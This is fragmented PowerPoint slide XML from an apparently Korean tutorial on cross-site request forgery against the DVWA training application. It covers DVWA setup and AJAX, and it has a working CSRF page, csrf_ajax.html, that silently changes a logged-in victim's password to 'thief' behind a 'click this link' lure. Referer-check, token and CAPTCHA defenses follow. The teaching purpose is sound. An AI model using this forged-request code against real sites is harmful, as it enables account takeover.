            </a:r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" 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width=0 height=0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="14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3469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3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</a:t>
            </a:r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 HTTP request - get )</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="20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A7DF4F7D-C223-484B-B1E9-3A9F55E195D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="443805" y="5737809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공격성공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패스워드가 변경 됐음을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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276488E8-FA1D-43B1-8727-EAB6C75D571E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="710505" y="2971785"/>
            <a:ext cx="6614220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f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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irefox의 모든 창을 닫는다. 세션키를 비롯한 쿠키가 없어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짐</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR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E363B316-11A5-48BE-8C0B-24ACD0BFF4D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="710505" y="3183864"/>
            <a:ext cx="6614220" cy="424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2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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2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irefox를 재실행하여 DVWA에 admin으로 로그인한다. 새로운 세션 키가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2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  <a:endParaRPr lang="en-US" altLang="ko-KR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809A2461-E980-4A5E-8E5D-96622CC3E01C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="710505" y="3529670"/>
            <a:ext cx="6614220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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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DVWA의 Security Level을 Low로 설정</a:t>
            </a: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52F0568F-0FCD-4C8F-AC99-7F1CD3FF2810}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="710505" y="3810505"/>
            <a:ext cx="6614220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4)  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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새로운 탭을 열어서 메일을 읽는다.</a:t>
            </a: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4193B753-FB35-4CE9-AB60-C967D3A51BB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="481905" y="2510794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2-3.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 확인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피해자의 입장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5540C5-3B35-48E4-B26C-2E371C325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7" y="4716467"/>
            <a:ext cx="5949406" cy="106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3700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소스코드 분석</a:t>
            </a:r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ko-KR" altLang="en-US" sz="20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1D754125-6290-475B-BE78-65D73E911FA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549063" y="2278305"/>
            <a:ext cx="5736954" cy="330906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if(isset($_GET['Change'])) {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Checks to see where the request came from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</a:t>
            </a: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/* Medium Level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에서 추가 된 부분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300" b="1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if(stripos($_SERVER['HTTP_REFERER'] ,$_SERVER['SERVER_NAME']) !== false) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="13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ea typeface="Nanum Myeongjo"/>
            </a:endParaRPr>
          </a:p>
          <a:p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요청한 URL이 시작된 지점($_SERVER[ 'HTTP_REFERER' ])의 문자열에 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="13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웹서버의 도메인 주소($_SERVER[ 'SERVER_NAME' ])가 포함되어 있는 지를 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="13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대소문자 구분없이 검사(eregi()) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1300" b="1">
              <a:solidFill>
                <a:srgbClr val="FF00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300" b="1">
              <a:solidFill>
                <a:srgbClr val="FF00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⁞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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 algn="ctr"/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2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 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="12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493490D9-CDD2-4923-AF81-B285F22E7055}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="481905" y="5587369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▪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CSRF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방어 방법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1 - Referrer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검증</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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066E8F4D-F3F3-4436-83DD-11C017476D71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="805755" y="6059154"/>
            <a:ext cx="5568404" cy="423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Request header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있는 요청을 한 페이지의 정보가 담긴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referrer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="텍스트 개체 틀 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73943038-5D52-485A-9B14-1269201A7CD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="815280" y="6921191"/>
            <a:ext cx="5539829" cy="424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일반적으로 이 방법만으로도 대부분 방어가 가능할 수 있음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텍스트 개체 틀 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7548C5DF-E214-41E7-B4FD-806A2FA38CE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="805755" y="7619999"/>
            <a:ext cx="6052245" cy="424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옥션이 아닌 개인 이메일에서 요청이 들어오는 것처럼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도메인 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텍스트 개체 틀 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDA5DB1C-8C95-470C-B0A0-464D2834BA69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1129605" y="7917759"/>
            <a:ext cx="5398191" cy="424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상에서 요청이 들어오지 않는다면 차단하도록 하는 것이다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EB92A448-C375-4DFD-9FB7-516C73255885}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="834330" y="6348644"/>
            <a:ext cx="5539829" cy="42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속성을 검증하여 차단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F586B2-754E-4B4A-A179-795387935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51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설치 및 설정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위의 명령어는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/var/www/html/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위치에서 실행한다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config.inc.php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20 $_DVWA[ ‘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db_user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’;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21 $_DVWA[ ‘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db_password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] = ‘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’;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DVWA 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설치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console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unzip DVWA-master.zip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/*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압축풀기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*/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mv DVWA-master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cd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/config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vi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config.inc.php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: set nu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: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wq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mysql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–u root –p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Enter password: ****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mysql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CREATE DATABASE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;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mysql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exit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0224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AJAX ?</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="20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493490D9-CDD2-4923-AF81-B285F22E7055}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="466665" y="2440309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Asynchronous Javascript And Xml (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비동기식 자바스크립트와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XML)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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066E8F4D-F3F3-4436-83DD-11C017476D71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="530497" y="3076692"/>
            <a:ext cx="5824611" cy="423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브라우저가 가지고있는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XMLHttpRequest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객체를 이용해서 전체 페이지를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7F586B2-754E-4B4A-A179-795387935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C4F37E5E-8AC4-4A52-8056-F2C727016CF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="530497" y="3388592"/>
            <a:ext cx="5824611" cy="423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새로 고치지 않고도 페이지의 일부만을 위한 데이터를 로드하는 기법</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="15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텍스트 개체 틀 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E8F9101-5088-4D01-8C1C-8974AC69506F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="530497" y="4004189"/>
            <a:ext cx="5824611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한마디로 정의하자면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="15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JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="15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사용한 비동기 통신</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1500">
              <a:solidFill>
                <a:srgbClr val="FF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텍스트 개체 틀 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95F790BB-AF17-4821-B582-F8714511AD97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="530497" y="4778822"/>
            <a:ext cx="5824611" cy="423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비동기 방식은 웹페이지를 리로드하지 않고 데이터를 불러오는 방식</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="15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텍스트 개체 틀 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8A3EDEB-B701-4577-83B3-310045DC8043}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="530497" y="5097710"/>
            <a:ext cx="5824611" cy="423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방식의 장점은 페이지 리로드의 경우 전체 리소스를 다시 불러와야 하는데 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="15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텍스트 개체 틀 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9287F37F-3F04-4C7F-85F5-0281A99F1472}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="530497" y="5433949"/>
            <a:ext cx="5997299" cy="423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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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스크립트 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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기타 코드 등을 모두 재요청할 경우 불필요한 리소스 낭비가</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="15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텍스트 개체 틀 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F20580F-F5DF-49F5-B627-975AE8F7C557}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1858917" y="5722703"/>
            <a:ext cx="5824611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발생하게 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="15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되는것을</a:t>
            </a:r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방지하기 위한 방식</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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4" name="텍스트 개체 틀 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED0F147C-BEF0-4D86-9613-ABF6C2DBA35E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="538117" y="6574798"/>
            <a:ext cx="5824611" cy="423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</a:t>
            </a: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프로토콜은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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request</a:t>
            </a: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response</a:t>
            </a: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하면서 페이지를 갱신하는데</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="15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텍스트 개체 틀 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F5AF9E2-F665-4D9B-BFF6-79A5CC33E8C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="538117" y="6895816"/>
            <a:ext cx="5824611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페이지 전체를 갱신하게 돼서 불필요한 자원 낭비를 하게 된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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36" name="텍스트 개체 틀 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E850E92-4850-4073-A8C5-2AF9F57919B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="538117" y="7220670"/>
            <a:ext cx="5824611" cy="423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하지만 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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AJAX</a:t>
            </a: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활용하면 전체를 갱신하지 않고 필요한 데이터만 받고</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="15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7" name="텍스트 개체 틀 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18911000-1808-4402-8A92-2DD2E368ABB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="538117" y="7531840"/>
            <a:ext cx="5824611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신할 수 있기 때문에 자원을 아낄 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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06398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코드 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="16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(Low Level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="16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공격가능 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="16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16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0D8B4170-1540-40FB-9C44-67CCFB5B23D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549063" y="2514525"/>
            <a:ext cx="5736954" cy="676155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&lt;html&gt;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&lt;meta charset="UTF-8"&gt;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&lt;head&gt;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&lt;/head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="11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&lt;script language="javascript"&gt;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//javascript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로 코드 작성</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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</a:t>
            </a:r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function csrf() {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	var host="192.168.80.11";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자기 자신의 주소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해킹대상 주소 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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	</a:t>
            </a:r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var url = "http://" + host + "/dvwa/vulnerabilities/csrf/?password_new=thief&amp;password_conf=thief&amp;Change=Change#";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패스워드를 바꿀때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클라이언트의 요청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(GET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방식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url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에 그대로 드러남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//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패스워드는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thief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로 설정</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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</a:t>
            </a:r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var xmlh = new XMLHttpRequest();</a:t>
            </a:r>
          </a:p>
          <a:p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//http request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쉽게 보내주는 인스턴스</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="11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//url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열고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request msg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써주기만 하면 된다</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="11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	xmlh.open("GET",url,true);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서버로부터 응답을 받은후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요청할 때 쓴다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순서대로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http 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요구방식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url, true : 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비동기적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false : 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동기적</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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</a:t>
            </a:r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xmlh.withCredentials="true";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쿠키값을 넣어주는 변수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.true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로 지정해주지 않으면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쿠키값이 들어가지 않음</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="11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//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쿠키값이 없게되면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서버는 클라이언트가 누군지 모르게 되어 클라이언트가</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="11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//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접속하지 않은 요청이 되어 버린다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	xmlh.send();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요청을 보내는 함수이다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alert("your password thief");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비밀번호가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thief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로 바뀌었다고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경고창 띄워주는 기능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</a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="11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}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&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="11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&lt;body&gt;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&lt;h2&gt;&lt;a href="javascript:csrf()"&gt;HI plz click this link&lt;/a&gt;&lt;/h2&gt;&lt;br&gt;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사용자 단에 보여지는 화면 구성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(HI plz click this link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라고 뜬다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&lt;/body&gt;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&lt;/html&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="11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602486D1-8BC1-4E19-B196-96E713117B9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="493335" y="2172954"/>
            <a:ext cx="5568404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vim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crsf_ajax.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42616356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확인 </a:t>
            </a:r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피해자의 입장</a:t>
            </a:r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5D1F7E97-176A-44BC-BC79-233A544EBE7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="588585" y="2339325"/>
            <a:ext cx="6614220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 csrf_ajax.html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실행</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR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텍스트 개체 틀 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F31646F-4E1B-4DC6-AF46-C5E19AC1F19F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="588585" y="4387824"/>
            <a:ext cx="6614220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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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thief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비밀번호 변경되었다고 알림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F992FC9D-37D9-4EFE-BAE0-66B5387172B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="588585" y="2906735"/>
            <a:ext cx="6614220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링크 클릭</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR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197FC4F6-E4A2-4CA2-8F6D-F1EB5AE7CB89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="588585" y="6774685"/>
            <a:ext cx="6614220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4)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공격성공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패스워드가 변경 됐음을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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D3C0C5C-9F59-48D1-A4E4-57CFCB3F96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t="34310" r="27205" b="34184"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="922020" y="4784726"/>
            <a:ext cx="2758440" cy="16535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2656A724-8CC1-43B4-9F95-316B8049D3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80"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="922020" y="3255229"/>
            <a:ext cx="3623310" cy="103914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46FF8FE9-3A94-4C0F-B433-46C66873F7B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="859184" y="7198844"/>
            <a:ext cx="5514975" cy="2215374"/>
            <a:chOff x="859184" y="7198844"/>
            <a:chExt cx="5514975" cy="22153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5E26293-39B4-44CA-8832-3CB11C29D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684"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="859184" y="7198844"/>
              <a:ext cx="5514975" cy="2215374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EC3F745-3076-47F4-A142-EF91FE8814DD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2819400" y="8400968"/>
              <a:ext cx="298132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C8DD9E29-B5A3-4A02-92E3-3837F73C7065}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1447800" y="9315368"/>
              <a:ext cx="302612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8294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소스코드 분석</a:t>
            </a:r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endParaRPr lang="ko-KR" altLang="en-US" sz="20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1D754125-6290-475B-BE78-65D73E911FA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="641827" y="2278305"/>
            <a:ext cx="5736954" cy="299875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if(isset($_GET['Change'])) {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Checks to see where the request came from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</a:t>
            </a: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/* High Level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에서 추가 된 부분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*/</a:t>
            </a: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en-US" altLang="ko-KR" sz="1300" b="1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checkToken($_REQUEST['user_token'], $_SESSION['session_token'], 'index.php')</a:t>
            </a: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⁞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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 algn="ctr"/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2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2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 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="12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7" name="텍스트 개체 틀 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{493490D9-CDD2-4923-AF81-B285F22E7055}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="481905" y="5587369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▪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CSRF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방어 방법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2 - CSRF Token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066E8F4D-F3F3-4436-83DD-11C017476D71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="805755" y="6059154"/>
            <a:ext cx="5568404" cy="423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랜덤한 수를 사용자의 세션에 저장하여 사용자의 모든 요청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(Request)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2" name="텍스트 개체 틀 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB92A448-C375-4DFD-9FB7-516C73255885}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="834330" y="6361344"/>
            <a:ext cx="5539829" cy="424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대하여 서버단에서 검증하는 방법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F9D10302-1CD1-4557-9C8F-9B6163F91E46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="634305" y="7260686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※ CSRF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방어 방법 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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3 - CAPTCHA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="18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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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8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텍스트 개체 틀 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCDAD1B0-79EF-433B-A43B-DA2D2235A671}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1062930" y="7619424"/>
            <a:ext cx="5568404" cy="42395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캡차 이미지상의 숫자 </a:t>
            </a:r>
            <a:r>
